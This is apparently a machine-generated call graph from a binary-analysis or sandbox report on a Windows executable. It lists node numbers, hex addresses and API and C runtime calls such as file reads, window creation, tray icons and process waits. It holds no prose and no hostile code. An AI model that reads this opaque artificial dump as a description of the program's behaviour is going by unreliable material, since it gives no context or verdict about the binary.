LoadLibraryA GetProcAddress 85153->85051 85155 40d86e 85154->85155 85156 40eb76 LoadLibraryA 85154->85156 85155->85051 85155->85153 85156->85155 85157 40eb87 GetProcAddress 85156->85157 85157->85155 85270 40e680 85158->85270 85162 401fa2 GetModuleFileNameW 85288 40ff90 85162->85288 85164 401fbd 85300 4107b0 85164->85300 85167 401b70 75 API calls 85168 401fe4 85167->85168 85303 4019e0 85168->85303 85170 401ff2 85171 4092c0 VariantClear 85170->85171 85172 402002 85171->85172 85173 401b70 75 API calls 85172->85173 85174 40201c 85173->85174 85175 4019e0 76 API calls 85174->85175 85176 40202c 85175->85176 85177 401b70 75 API calls 85176->85177 85178 40203c 85177->85178 85311 40c3e0 85178->85311 85180 40204d 85329 40c060 85180->85329 85184 40206e 85341 4115d0 85184->85341 85187 42c174 85189 401a70 75 API calls 85187->85189 85188 402088 85190 4115d0 __wcsicoll 79 API calls 85188->85190 85191 42c189 85189->85191 85192 402093 85190->85192 85194 401a70 75 API calls 85191->85194 85192->85191 85193 40209e 85192->85193 85195 4115d0 __wcsicoll 79 API calls 85193->85195 85196 42c1a7 85194->85196 85197 4020a9 85195->85197 85198 42c1b0 GetModuleFileNameW 85196->85198 85197->85198 85199 4020b4 85197->85199 85201 401a70 75 API calls 85198->85201 85200 4115d0 __wcsicoll 79 API calls 85199->85200 85202 4020bf 85200->85202 85203 42c1e2 85201->85203 85204 402107 85202->85204 85207 42c20a _wcscpy 85202->85207 85210 401a70 75 API calls 85202->85210 85353 40df50 75 API calls 85203->85353 85206 402119 85204->85206 85204->85207 85209 42c243 85206->85209 85349 40e7e0 76 API calls 85206->85349 85215 401a70 75 API calls 85207->85215 85208 42c1f1 85211 401a70 75 API calls 85208->85211 85214 4020e5 _wcscpy 85210->85214 85212 42c201 85211->85212 85212->85207 85218 401a70 75 API calls 85214->85218 85223 402148 85215->85223 85216 402132 85350 40d030 76 API calls 85216->85350 85218->85204 85219 40213e 85220 4092c0 VariantClear 85219->85220 85220->85223 85221 402184 85225 4092c0 VariantClear 85221->85225 85223->85221 85226 401a70 75 API calls 85223->85226 85351 40d030 76 API calls 85223->85351 85352 40e640 76 API calls 85223->85352 85227 402196 ctype 85225->85227 85226->85223 85227->85118 85229 40f3c9 85228->85229 85230 42ccf4 _memset 85228->85230 86031 40ffb0 76 API calls ctype 85229->86031 85232 42cd05 GetOpenFileNameW 85230->85232 85232->85229 85235 40d732 85232->85235 85233 40f3d2 86032 410130 SHGetMalloc 85233->86032 85235->85126 85235->85128 85236 40f3d9 86037 410020 88 API calls __wcsicoll 85236->86037 85238 40f3e7 86038 40f400 85238->86038 85241 42b9d3 85240->85241 85242 41025a LoadImageW RegisterClassExW 85240->85242 86085 443e8f EnumResourceNamesW LoadImageW 85241->86085 86084 4102f0 7 API calls 85242->86084 85245 42b9da 85246 40d790 85247 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85246->85247 85247->85140 85250 40e207 _memset 85248->85250 85249 40e262 85252 40e2a4 85249->85252 86086 43737d 84 API calls __wcsicoll 85249->86086 85250->85249 85251 42aa14 DestroyIcon 85250->85251 85251->85249 85254 40e2c0 Shell_NotifyIconW 85252->85254 85255 42aa50 Shell_NotifyIconW 85252->85255 85256 401be0 77 API calls 85254->85256 85257 40e2da 85256->85257 85257->85148 85258->85128 85259->85142 85260->85128 85261->85134 85263 401b76 _wcslen 85262->85263 85264 41171a 75 API calls 85263->85264 85267 401bc5 85263->85267 85265 401bad _realloc 85264->85265 85266 41171a 75 API calls 85265->85266 85266->85267 85268 40d3b0 75 API calls 2 library calls 85267->85268 85268->85147 85269->85151 85271 40c060 75 API calls 85270->85271 85272 401f90 85271->85272 85273 402940 85272->85273 85274 40294a __write_nolock 85273->85274 85275 4021e0 75 API calls 85274->85275 85277 402972 85275->85277 85287 4029a4 85277->85287 85354 401cf0 85277->85354 85278 402ae0 75 API calls 85278->85287 85279 402a8c 85280 401b70 75 API calls 85279->85280 85286 402abe 85279->85286 85282 402ab3 85280->85282 85281 401b70 75 API calls 85281->85287 85358 40d970 75 API calls 2 library calls 85282->85358 85284 401cf0 75 API calls 85284->85287 85286->85162 85287->85278 85287->85279 85287->85281 85287->85284 85357 40d970 75 API calls 2 library calls 85287->85357 85359 40f5e0 85288->85359 85291 40ffa6 85291->85164 85293 42b6d8 85296 42b6e6 85293->85296 85415 434fe1 85293->85415 85295 413a88 __wsetenvp 67 API calls 85297 42b6f5 85295->85297 85296->85295 85298 434fe1 106 API calls 85297->85298 85299 42b702 85298->85299 85299->85164 85301 41171a 75 API calls 85300->85301 85302 401fd6 85301->85302 85302->85167 85304 401a03 85303->85304 85309 4019e5 85303->85309 85305 401a1a 85304->85305 85304->85309 86020 404260 76 API calls 85305->86020 85307 4019ff 85307->85170 85308 401a26 85308->85170 85309->85307 86019 404260 76 API calls 85309->86019 85312 40c3e4 85311->85312 85313 40c42c 85311->85313 85316 40c3f0 85312->85316 85317 42a475 85312->85317 85314 42a422 85313->85314 85315 40c435 85313->85315 85321 42a427 85314->85321 85322 42a445 85314->85322 85318 40c441 85315->85318 85319 42a455 85315->85319 86021 4042f0 75 API calls __cinit 85316->86021 86026 453155 75 API calls 85317->86026 86022 4042f0 75 API calls __cinit 85318->86022 86025 453155 75 API calls 85319->86025 85328 40c3fb 85321->85328 86023 453155 75 API calls 85321->86023 86024 453155 75 API calls 85322->86024 85328->85180 85328->85328 85330 41171a 75 API calls 85329->85330 85331 40c088 85330->85331 85332 41171a 75 API calls 85331->85332 85333 402061 85332->85333 85334 401a70 85333->85334 85335 401a90 85334->85335 85336 401a77 85334->85336 85337 4021e0 75 API calls 85335->85337 85338 401a8d 85336->85338 86027 404080 75 API calls _realloc 85336->86027 85339 401a9c 85337->85339 85338->85184 85339->85184 85342 4115e1 85341->85342 85343 411650 85341->85343 85348 40207d 85342->85348 86028 417f23 67 API calls __getptd_noexit 85342->86028 86030 4114bf 79 API calls 3 library calls 85343->86030 85346 4115ed 86029 417ebb 6 API calls 2 library calls 85346->86029 85348->85187 85348->85188 85349->85216 85350->85219 85351->85223 85352->85223 85353->85208 85355 402ae0 75 API calls 85354->85355 85356 401cf7 85355->85356 85356->85277 85357->85287 85358->85286 85419 40f580 85359->85419 85361 40f5f8 _strcat ctype 85427 40f6d0 85361->85427 85366 42b2ee 85456 4151b0 85366->85456 85368 40f679 85368->85366 85369 40f681 85368->85369 85443 414e94 85369->85443 85373 40f68b 85373->85291 85378 452574 85373->85378 85375 42b31d 85462 415484 85375->85462 85377 42b33d 85379 41557c _fseek 105 API calls 85378->85379 85380 4525df 85379->85380 85964 4523ce 85380->85964 85383 4525fc 85383->85293 85384 4151b0 __fread_nolock 81 API calls 85385 45261d 85384->85385 85386 4151b0 __fread_nolock 81 API calls 85385->85386 85387 45262e 85386->85387 85388 4151b0 __fread_nolock 81 API calls 85387->85388 85389 452649 85388->85389 85390 4151b0 __fread_nolock 81 API calls 85389->85390 85391 452666 85390->85391 85392 41557c _fseek 105 API calls 85391->85392 85393 452682 85392->85393 85394 4138ba _malloc 67 API calls 85393->85394 85395 45268e 85394->85395 85396 4138ba _malloc 67 API calls 85395->85396 85397 45269b 85396->85397 85398 4151b0 __fread_nolock 81 API calls 85397->85398 85399 4526ac 85398->85399 85400 44afdc GetSystemTimeAsFileTime 85399->85400 85401 4526bf 85400->85401 85402 4526d5 85401->85402 85403 4526fd 85401->85403 85406 413a88 __wsetenvp 67 API calls 85402->85406 85404 452704 85403->85404 85405 45275b 85403->85405 85970 44b195 85404->85970 85408 413a88 __wsetenvp 67 API calls 85405->85408 85409 4526df 85406->85409 85411 452759 85408->85411 85412 413a88 __wsetenvp 67 API calls 85409->85412 85410 452753 85413 413a88 __wsetenvp 67 API calls 85410->85413 85411->85293 85414 4526e8 85412->85414 85413->85411 85414->85293 85416 434ff1 85415->85416 85417 434feb 85415->85417 85416->85296 85418 414e94 __fcloseall 106 API calls 85417->85418 85418->85416 85420 429440 85419->85420 85421 40f589 _wcslen 85419->85421 85422 40f58f WideCharToMultiByte 85421->85422 85423 40f5d8 85422->85423 85424 40f5ad 85422->85424 85423->85361 85425 41171a 75 API calls 85424->85425 85426 40f5bb WideCharToMultiByte 85425->85426 85426->85361 85428 40f6dd _strlen 85427->85428 85475 40f790 85428->85475 85431 414e06 85495 414d40 85431->85495 85433 40f666 85433->85366 85434 40f450 85433->85434 85438 40f45a _strcat _realloc __write_nolock 85434->85438 85435 4151b0 __fread_nolock 81 API calls 85435->85438 85437 42936d 85439 41557c _fseek 105 API calls 85437->85439 85438->85435 85438->85437 85442 40f531 85438->85442 85578 41557c 85438->85578 85440 429394 85439->85440 85441 4151b0 __fread_nolock 81 API calls 85440->85441 85441->85442 85442->85368 85444 414ea0 __calloc_impl 85443->85444 85445 414ed1 85444->85445 85446 414eb4 85444->85446 85449 415965 __lock_file 68 API calls 85445->85449 85452 414ec9 __calloc_impl 85445->85452 85717 417f23 67 API calls __getptd_noexit 85446->85717 85448 414eb9 85718 417ebb 6 API calls 2 library calls 85448->85718 85451 414ee9 85449->85451 85701 414e1d 85451->85701 85452->85373 85786 41511a 85456->85786 85458 4151c8 85459 44afdc 85458->85459 85957 4431e0 85459->85957 85461 44affd 85461->85375 85463 415490 __calloc_impl 85462->85463 85464 4154bb 85463->85464 85465 41549e 85463->85465 85466 415965 __lock_file 68 API calls 85464->85466 85961 417f23 67 API calls __getptd_noexit 85465->85961 85468 4154c3 85466->85468 85470 4152e7 __ftell_nolock 71 API calls 85468->85470 85469 4154a3 85962 417ebb 6 API calls 2 library calls 85469->85962 85472 4154cf 85470->85472 85963 4154e8 LeaveCriticalSection LeaveCriticalSection _ftell 85472->85963 85474 4154b3 __calloc_impl 85474->85377 85478 40f7ae _memset 85475->85478 85476 42a349 85478->85476 85479 40f628 85478->85479 85480 415258 85478->85480 85479->85431 85481 415285 85480->85481 85482 415268 85480->85482 85481->85482 85483 41528c 85481->85483 85491 417f23 67 API calls __getptd_noexit 85482->85491 85493 41c551 103 API calls 14 library calls 85483->85493 85486 41526d 85492 417ebb 6 API calls 2 library calls 85486->85492 85488 4152b2 85489 41527d 85488->85489 85494 4191c9 101 API calls 6 library calls 85488->85494 85489->85478 85491->85486 85493->85488 85494->85489 85496 414d4c __calloc_impl 85495->85496 85497 414d5f 85496->85497 85499 414d95 85496->85499 85547 417f23 67 API calls __getptd_noexit 85497->85547 85514 41e28c 85499->85514 85500 414d64 85548 417ebb 6 API calls 2 library calls 85500->85548 85503 414d9a 85504 414da1 85503->85504 85505 414dae 85503->85505 85549 417f23 67 API calls __getptd_noexit 85504->85549 85507 414dd6 85505->85507 85508 414db6 85505->85508 85532 41dfd8 85507->85532 85550 417f23 67 API calls __getptd_noexit 85508->85550 85512 414d74 __calloc_impl @_EH4_CallFilterFunc@8 85512->85433 85515 41e298 __calloc_impl 85514->85515 85516 418407 __lock 67 API calls 85515->85516 85517 41e2a6 85516->85517 85518 41e322 85517->85518 85524 418344 __mtinitlocknum 67 API calls 85517->85524 85529 41e31b 85517->85529 85555 4159a6 68 API calls __lock 85517->85555 85556 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85517->85556 85519 416fb6 __malloc_crt 67 API calls 85518->85519 85522 41e32c 85519->85522 85521 41e3b0 __calloc_impl 85521->85503 85522->85529 85557 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 85522->85557 85524->85517 85526 41e351 85527 41e35c 85526->85527 85528 41e36f EnterCriticalSection 85526->85528 85530 413a88 __wsetenvp 67 API calls 85527->85530 85528->85529 85552 41e3bb 85529->85552 85530->85529 85539 41dffb __wopenfile 85532->85539 85533 41e015 85562 417f23 67 API calls __getptd_noexit 85533->85562 85535 41e01a 85563 417ebb 6 API calls 2 library calls 85535->85563 85537 41e247 85559 425db0 85537->85559 85539->85533 85546 41e1e9 85539->85546 85564 4136bc 79 API calls 2 library calls 85539->85564 85542 41e1e2 85542->85546 85565 4136bc 79 API calls 2 library calls 85542->85565 85544 41e201 85544->85546 85566 4136bc 79 API calls 2 library calls 85544->85566 85546->85533 85546->85537 85547->85500 85549->85512 85550->85512 85551 414dfc LeaveCriticalSection LeaveCriticalSection _ftell 85551->85512 85558 41832d LeaveCriticalSection 85552->85558 85554 41e3c2 85554->85521 85555->85517 85556->85517 85557->85526 85558->85554 85567 425ce4 85559->85567 85561 414de1 85561->85551 85562->85535 85564->85542 85565->85544 85566->85546 85570 425cf0 __calloc_impl 85567->85570 85568 425d03 85569 417f23 __calloc_impl 67 API calls 85568->85569 85571 425d08 85569->85571 85570->85568 85572 425d41 85570->85572 85573 417ebb __calloc_impl 6 API calls 85571->85573 85574 4255c4 __tsopen_nolock 132 API calls 85572->85574 85577 425d17 __calloc_impl 85573->85577 85575 425d5b 85574->85575 85576 425d82 __sopen_helper LeaveCriticalSection 85575->85576 85576->85577 85577->85561 85582 415588 __calloc_impl 85578->85582 85579 415596 85609 417f23 67 API calls __getptd_noexit 85579->85609 85581 4155c4 85591 415965 85581->85591 85582->85579 85582->85581 85584 41559b 85610 417ebb 6 API calls 2 library calls 85584->85610 85590 4155ab __calloc_impl 85590->85438 85592 415977 85591->85592 85593 415999 EnterCriticalSection 85591->85593 85592->85593 85594 41597f 85592->85594 85595 4155cc 85593->85595 85596 418407 __lock 67 API calls 85594->85596 85597 4154f2 85595->85597 85596->85595 85598 415512 85597->85598 85599 415502 85597->85599 85604 415524 85598->85604 85612 4152e7 85598->85612 85666 417f23 67 API calls __getptd_noexit 85599->85666 85603 415507 85611 4155f7 LeaveCriticalSection LeaveCriticalSection _ftell 85603->85611 85629 41486c 85604->85629 85609->85584 85611->85590 85613 41531a 85612->85613 85614 4152fa 85612->85614 85616 41453a __fileno 67 API calls 85613->85616 85667 417f23 67 API calls __getptd_noexit 85614->85667 85618 415320 85616->85618 85617 4152ff 85668 417ebb 6 API calls 2 library calls 85617->85668 85620 41efd4 __locking 71 API calls 85618->85620 85621 415335 85620->85621 85622 4153a9 85621->85622 85624 415364 85621->85624 85628 41530f 85621->85628 85669 417f23 67 API calls __getptd_noexit 85622->85669 85625 41efd4 __locking 71 API calls 85624->85625 85624->85628 85626 415404 85625->85626 85627 41efd4 __locking 71 API calls 85626->85627 85626->85628 85627->85628 85628->85604 85630 414885 85629->85630 85634 4148a7 85629->85634 85631 41453a __fileno 67 API calls 85630->85631 85630->85634 85632 4148a0 85631->85632 85670 41c3cf 101 API calls 5 library calls 85632->85670 85635 41453a 85634->85635 85636 41455e 85635->85636 85637 414549 85635->85637 85641 41efd4 85636->85641 85671 417f23 67 API calls __getptd_noexit 85637->85671 85639 41454e 85672 417ebb 6 API calls 2 library calls 85639->85672 85642 41efe0 __calloc_impl 85641->85642 85643 41f003 85642->85643 85644 41efe8 85642->85644 85646 41f011 85643->85646 85649 41f052 85643->85649 85693 417f36 67 API calls __getptd_noexit 85644->85693 85695 417f36 67 API calls __getptd_noexit 85646->85695 85647 41efed 85694 417f23 67 API calls __getptd_noexit 85647->85694 85673 41ba3b 85649->85673 85651 41f016 85696 417f23 67 API calls __getptd_noexit 85651->85696 85654 41f058 85657 41f065 85654->85657 85658 41f07b 85654->85658 85655 41f01d 85697 417ebb 6 API calls 2 library calls 85655->85697 85683 41ef5f 85657->85683 85698 417f23 67 API calls __getptd_noexit 85658->85698 85659 41eff5 __calloc_impl 85659->85603 85662 41f073 85700 41f0a6 LeaveCriticalSection __unlock_fhandle 85662->85700 85663 41f080 85699 417f36 67 API calls __getptd_noexit 85663->85699 85666->85603 85667->85617 85669->85628 85670->85634 85671->85639 85674 41ba47 __calloc_impl 85673->85674 85675 41baa2 85674->85675 85678 418407 __lock 67 API calls 85674->85678 85676 41bac4 __calloc_impl 85675->85676 85677 41baa7 EnterCriticalSection 85675->85677 85676->85654 85677->85676 85679 41ba73 85678->85679 85680 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 85679->85680 85682 41ba8a 85679->85682 85680->85682 85681 41bad2 ___lock_fhandle LeaveCriticalSection 85681->85675 85682->85681 85684 41b9c4 __lseek_nolock 67 API calls 85683->85684 85685 41ef6e 85684->85685 85686 41ef84 SetFilePointer 85685->85686 85687 41ef74 85685->85687 85689 41ef9b GetLastError 85686->85689 85691 41efa3 85686->85691 85688 417f23 __calloc_impl 67 API calls 85687->85688 85690 41ef79 85688->85690 85689->85691 85690->85662 85691->85690 85692 417f49 __dosmaperr 67 API calls 85691->85692 85692->85690 85693->85647 85694->85659 85695->85651 85696->85655 85698->85663 85699->85662 85700->85659 85702 414e31 85701->85702 85703 414e4d 85701->85703 85747 417f23 67 API calls __getptd_noexit 85702->85747 85705 414e46 85703->85705 85707 41486c __flush 101 API calls 85703->85707 85719 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 85705->85719 85706 414e36 85748 417ebb 6 API calls 2 library calls 85706->85748 85709 414e59 85707->85709 85720 41e680 85709->85720 85712 41453a __fileno 67 API calls 85713 414e67 85712->85713 85724 41e5b3 85713->85724 85715 414e6d 85715->85705 85716 413a88 __wsetenvp 67 API calls 85715->85716 85716->85705 85717->85448 85719->85452 85721 41e690 85720->85721 85722 414e61 85720->85722 85721->85722 85723 413a88 __wsetenvp 67 API calls 85721->85723 85722->85712 85723->85722 85725 41e5bf __calloc_impl 85724->85725 85726 41e5e2 85725->85726 85727 41e5c7 85725->85727 85729 41e5f0 85726->85729 85733 41e631 85726->85733 85764 417f36 67 API calls __getptd_noexit 85727->85764 85766 417f36 67 API calls __getptd_noexit 85729->85766 85731 41e5cc 85765 417f23 67 API calls __getptd_noexit 85731->85765 85732 41e5f5 85767 417f23 67 API calls __getptd_noexit 85732->85767 85736 41ba3b ___lock_fhandle 68 API calls 85733->85736 85738 41e637 85736->85738 85737 41e5fc 85768 417ebb 6 API calls 2 library calls 85737->85768 85740 41e652 85738->85740 85741 41e644 85738->85741 85769 417f23 67 API calls __getptd_noexit 85740->85769 85749 41e517 85741->85749 85742 41e5d4 __calloc_impl 85742->85715 85745 41e64c 85770 41e676 LeaveCriticalSection __unlock_fhandle 85745->85770 85747->85706 85771 41b9c4 85749->85771 85751 41e57d 85784 41b93e 68 API calls 2 library calls 85751->85784 85753 41e527 85753->85751 85755 41b9c4 __lseek_nolock 67 API calls 85753->85755 85763 41e55b 85753->85763 85754 41e585 85757 41e5a7 85754->85757 85785 417f49 67 API calls 3 library calls 85754->85785 85758 41e552 85755->85758 85756 41b9c4 __lseek_nolock 67 API calls 85759 41e567 CloseHandle 85756->85759 85757->85745 85761 41b9c4 __lseek_nolock 67 API calls 85758->85761 85759->85751 85762 41e573 GetLastError 85759->85762 85761->85763 85762->85751 85763->85751 85763->85756 85764->85731 85765->85742 85766->85732 85767->85737 85769->85745 85770->85742 85772 41b9d1 85771->85772 85774 41b9e9 85771->85774 85773 417f36 __free_osfhnd 67 API calls 85772->85773 85776 41b9d6 85773->85776 85775 417f36 __free_osfhnd 67 API calls 85774->85775 85777 41ba2e 85774->85777 85778 41ba17 85775->85778 85779 417f23 __calloc_impl 67 API calls 85776->85779 85777->85753 85780 417f23 __calloc_impl 67 API calls 85778->85780 85781 41b9de 85779->85781 85782 41ba1e 85780->85782 85781->85753 85783 417ebb __calloc_impl 6 API calls 85782->85783 85783->85777 85784->85754 85785->85757 85787 415126 __calloc_impl 85786->85787 85788 41513a _memset 85787->85788 85789 41516f 85787->85789 85791 415164 __calloc_impl 85787->85791 85815 417f23 67 API calls __getptd_noexit 85788->85815 85790 415965 __lock_file 68 API calls 85789->85790 85792 415177 85790->85792 85791->85458 85799 414f10 85792->85799 85795 415154 85816 417ebb 6 API calls 2 library calls 85795->85816 85803 414f2e _memset 85799->85803 85806 414f4c 85799->85806 85800 414f37 85868 417f23 67 API calls __getptd_noexit 85800->85868 85802 414f3c 85869 417ebb 6 API calls 2 library calls 85802->85869 85803->85800 85803->85806 85811 414f8b 85803->85811 85817 4151a6 LeaveCriticalSection LeaveCriticalSection _ftell 85806->85817 85807 4150a9 _memset 85871 417f23 67 API calls __getptd_noexit 85807->85871 85808 4150d5 _memset 85872 417f23 67 API calls __getptd_noexit 85808->85872 85810 41453a __fileno 67 API calls 85810->85811 85811->85806 85811->85807 85811->85808 85811->85810 85818 41ed9e 85811->85818 85848 41e6b1 85811->85848 85870 41ee9b 67 API calls 3 library calls 85811->85870 85815->85795 85817->85791 85819 41edaa __calloc_impl 85818->85819 85820 41edb2 85819->85820 85821 41edcd 85819->85821 85942 417f36 67 API calls __getptd_noexit 85820->85942 85822 41eddb 85821->85822 85827 41ee1c 85821->85827 85944 417f36 67 API calls __getptd_noexit 85822->85944 85825 41edb7 85943 417f23 67 API calls __getptd_noexit 85825->85943 85826 41ede0 85945 417f23 67 API calls __getptd_noexit 85826->85945 85830 41ee29 85827->85830 85831 41ee3d 85827->85831 85947 417f36 67 API calls __getptd_noexit 85830->85947 85833 41ba3b ___lock_fhandle 68 API calls 85831->85833 85832 41edbf __calloc_impl 85832->85811 85836 41ee43 85833->85836 85834 41ede7 85946 417ebb 6 API calls 2 library calls 85834->85946 85838 41ee50 85836->85838 85839 41ee66 85836->85839 85837 41ee2e 85948 417f23 67 API calls __getptd_noexit 85837->85948 85873 41e7dc 85838->85873 85949 417f23 67 API calls __getptd_noexit 85839->85949 85844 41ee6b 85950 417f36 67 API calls __getptd_noexit 85844->85950 85846 41ee5e 85951 41ee91 LeaveCriticalSection __unlock_fhandle 85846->85951 85849 41e6c1 85848->85849 85853 41e6de 85848->85853 85955 417f23 67 API calls __getptd_noexit 85849->85955 85851 41e6c6 85956 417ebb 6 API calls 2 library calls 85851->85956 85854 41e713 85853->85854 85860 41e6d6 85853->85860 85952 423600 85853->85952 85856 41453a __fileno 67 API calls 85854->85856 85857 41e727 85856->85857 85858 41ed9e __read 79 API calls 85857->85858 85859 41e72e 85858->85859 85859->85860 85861 41453a __fileno 67 API calls 85859->85861 85860->85811 85862 41e751 85861->85862 85862->85860 85863 41453a __fileno 67 API calls 85862->85863 85864 41e75d 85863->85864 85864->85860 85865 41453a __fileno 67 API calls 85864->85865 85866 41e769 85865->85866 85867 41453a __fileno 67 API calls 85866->85867 85867->85860 85868->85802 85870->85811 85871->85802 85872->85802 85874 41e813 85873->85874 85875 41e7f8 85873->85875 85877 41e822 85874->85877 85878 41e849 85874->85878 85876 417f36 __free_osfhnd 67 API calls 85875->85876 85880 41e7fd 85876->85880 85879 417f36 __free_osfhnd 67 API calls 85877->85879 85882 41e868 85878->85882 85893 41e87c 85878->85893 85881 41e827 85879->85881 85883 417f23 __calloc_impl 67 API calls 85880->85883 85884 417f23 __calloc_impl 67 API calls 85881->85884 85885 417f36 __free_osfhnd 67 API calls 85882->85885 85894 41e805 85883->85894 85887 41e82e 85884->85887 85889 41e86d 85885->85889 85886 41e8d4 85888 417f36 __free_osfhnd 67 API calls 85886->85888 85890 417ebb __calloc_impl 6 API calls 85887->85890 85891 41e8d9 85888->85891 85892 417f23 __calloc_impl 67 API calls 85889->85892 85890->85894 85895 417f23 __calloc_impl 67 API calls 85891->85895 85896 41e874 85892->85896 85893->85886 85893->85894 85897 41e8b0 85893->85897 85898 41e8f5 85893->85898 85894->85846 85895->85896 85899 417ebb __calloc_impl 6 API calls 85896->85899 85897->85886 85905 41e8bb ReadFile 85897->85905 85900 416fb6 __malloc_crt 67 API calls 85898->85900 85899->85894 85902 41e90b 85900->85902 85908 41e931 85902->85908 85909 41e913 85902->85909 85903 41ed62 GetLastError 85906 41ebe8 85903->85906 85907 41ed6f 85903->85907 85904 41e9e7 85904->85903 85912 41e9fb 85904->85912 85905->85903 85905->85904 85916 417f49 __dosmaperr 67 API calls 85906->85916 85921 41eb6d 85906->85921 85910 417f23 __calloc_impl 67 API calls 85907->85910 85913 423462 __lseeki64_nolock 69 API calls 85908->85913 85911 417f23 __calloc_impl 67 API calls 85909->85911 85914 41ed74 85910->85914 85915 41e918 85911->85915 85912->85921 85922 41ea17 85912->85922 85925 41ec2d 85912->85925 85917 41e93d 85913->85917 85918 417f36 __free_osfhnd 67 API calls 85914->85918 85919 417f36 __free_osfhnd 67 API calls 85915->85919 85916->85921 85917->85905 85918->85921 85919->85894 85920 413a88 __wsetenvp 67 API calls 85920->85894 85921->85894 85921->85920 85923 41ea7d ReadFile 85922->85923 85930 41eafa 85922->85930 85926 41ea9b GetLastError 85923->85926 85933 41eaa5 85923->85933 85924 41eca5 ReadFile 85927 41ecc4 GetLastError 85924->85927 85934 41ecce 85924->85934 85925->85921 85925->85924 85926->85922 85926->85933 85927->85925 85927->85934 85928 41ebbe MultiByteToWideChar 85928->85921 85929 41ebe2 GetLastError 85928->85929 85929->85906 85930->85921 85931 41eb75 85930->85931 85932 41eb68 85930->85932 85941 41eb32 85930->85941 85938 41ebac 85931->85938 85931->85941 85935 417f23 __calloc_impl 67 API calls 85932->85935 85933->85922 85936 423462 __lseeki64_nolock 69 API calls 85933->85936 85934->85925 85937 423462 __lseeki64_nolock 69 API calls 85934->85937 85935->85921 85936->85933 85937->85934 85939 423462 __lseeki64_nolock 69 API calls 85938->85939 85940 41ebbb 85939->85940 85940->85928 85941->85928 85942->85825 85943->85832 85944->85826 85945->85834 85947->85837 85948->85834 85949->85844 85950->85846 85951->85832 85953 416fb6 __malloc_crt 67 API calls 85952->85953 85954 423615 85953->85954 85954->85854 85955->85851 85960 414cef GetSystemTimeAsFileTime __aulldiv 85957->85960 85959 4431ef 85959->85461 85960->85959 85961->85469 85963->85474 85967 4523e1 _wcscpy 85964->85967 85965 44afdc GetSystemTimeAsFileTime 85965->85967 85966 452553 85966->85383 85966->85384 85967->85965 85967->85966 85968 4151b0 81 API calls __fread_nolock 85967->85968 85969 41557c 105 API calls _fseek 85967->85969 85968->85967 85969->85967 85971 44b1b4 85970->85971 85972 44b1a6 85970->85972 85974 44b1ca 85971->85974 85975 414e06 138 API calls 85971->85975 85976 44b1c2 85971->85976 85973 414e06 138 API calls 85972->85973 85973->85971 86005 4352d1 81 API calls 2 library calls 85974->86005 85978 44b2c1 85975->85978 85976->85410 85978->85974 85980 44b2cf 85978->85980 85979 44b20d 85981 44b211 85979->85981 85982 44b23b 85979->85982 85983 44b2dc 85980->85983 85985 414e94 __fcloseall 106 API calls 85980->85985 85984 44b21e 85981->85984 85987 414e94 __fcloseall 106 API calls 85981->85987 86006 43526e 85982->86006 85983->85410 85989 414e94 __fcloseall 106 API calls 85984->85989 85993 44b22e 85984->85993 85985->85983 85987->85984 85988 44b242 85990 44b270 85988->85990 85991 44b248 85988->85991 85989->85993 86016 44b0af 111 API calls 85990->86016 85994 44b255 85991->85994 85995 414e94 __fcloseall 106 API calls 85991->85995 85993->85410 85996 44b265 85994->85996 85998 414e94 __fcloseall 106 API calls 85994->85998 85995->85994 85996->85410 85997 44b276 86017 43522c 67 API calls __wsetenvp 85997->86017 85998->85996 86000 44b27c 86001 44b289 86000->86001 86003 414e94 __fcloseall 106 API calls 86000->86003 86002 44b299 86001->86002 86004 414e94 __fcloseall 106 API calls 86001->86004 86002->85410 86003->86001 86004->86002 86005->85979 86007 4138ba _malloc 67 API calls 86006->86007 86008 43527d 86007->86008 86009 4138ba _malloc 67 API calls 86008->86009 86010 43528d 86009->86010 86011 4138ba _malloc 67 API calls 86010->86011 86012 43529d 86011->86012 86014 4352bc 86012->86014 86018 43522c 67 API calls __wsetenvp 86012->86018 86014->85988 86015 4352c8 86015->85988 86016->85997 86017->86000 86018->86015 86019->85307 86020->85308 86021->85328 86022->85328 86023->85328 86024->85319 86025->85328 86026->85328 86027->85338 86028->85346 86030->85348 86031->85233 86033 410148 SHGetDesktopFolder 86032->86033 86036 4101a3 _wcscpy 86032->86036 86034 41015a _wcscpy 86033->86034 86033->86036 86035 41018a SHGetPathFromIDListW 86034->86035 86034->86036 86035->86036 86036->85236 86037->85238 86039 40f5e0 152 API calls 86038->86039 86040 40f417 86039->86040 86041 42ca37 86040->86041 86043 40f42c 86040->86043 86044 42ca1f 86040->86044 86042 452574 140 API calls 86041->86042 86046 42ca50 86042->86046 86079 4037e0 139 API calls 7 library calls 86043->86079 86080 43717f 110 API calls _printf 86044->86080 86049 42ca76 86046->86049 86050 42ca54 86046->86050 86048 42ca2d 86048->86041 86053 41171a 75 API calls 86049->86053 86052 434fe1 106 API calls 86050->86052 86051 40f446 86051->85235 86054 42ca5e 86052->86054 86061 42cacc ctype 86053->86061 86081 43717f 110 API calls _printf 86054->86081 86056 42ccc3 86058 413a88 __wsetenvp 67 API calls 86056->86058 86057 42ca6c 86057->86049 86059 42cccd 86058->86059 86060 434fe1 106 API calls 86059->86060 86062 42ccda 86060->86062 86061->86056 86066 401b70 75 API calls 86061->86066 86069 445051 86061->86069 86072 402cc0 75 API calls 2 library calls 86061->86072 86073 4026a0 86061->86073 86082 44c80c 87 API calls 3 library calls 86061->86082 86083 44b408 75 API calls 86061->86083 86066->86061 86070 41171a 75 API calls 86069->86070 86071 445080 _realloc 86070->86071 86071->86061 86071->86071 86072->86061 86074 4026af 86073->86074 86076 40276b 86073->86076 86075 41171a 75 API calls 86074->86075 86074->86076 86077 4026ee ctype 86074->86077 86075->86077 86076->86061 86077->86076 86078 41171a 75 API calls 86077->86078 86078->86077 86079->86051 86080->86048 86081->86057 86082->86061 86083->86061 86084->85246 86085->85245 86086->85252 86087 431914 86088 431920 86087->86088 86089 431928 86088->86089 86090 43193d 86088->86090 86296 45e62e 116 API calls 3 library calls 86089->86296 86297 47f2b4 174 API calls 86090->86297 86093 43194a 86101 4095b0 ctype 86093->86101 86298 45e62e 116 API calls 3 library calls 86093->86298 86094 409708 86097 4097af 86097->86094 86282 40d590 VariantClear 86097->86282 86099 4315b8 WaitForSingleObject 86099->86101 86103 4315d6 GetExitCodeProcess CloseHandle 86099->86103 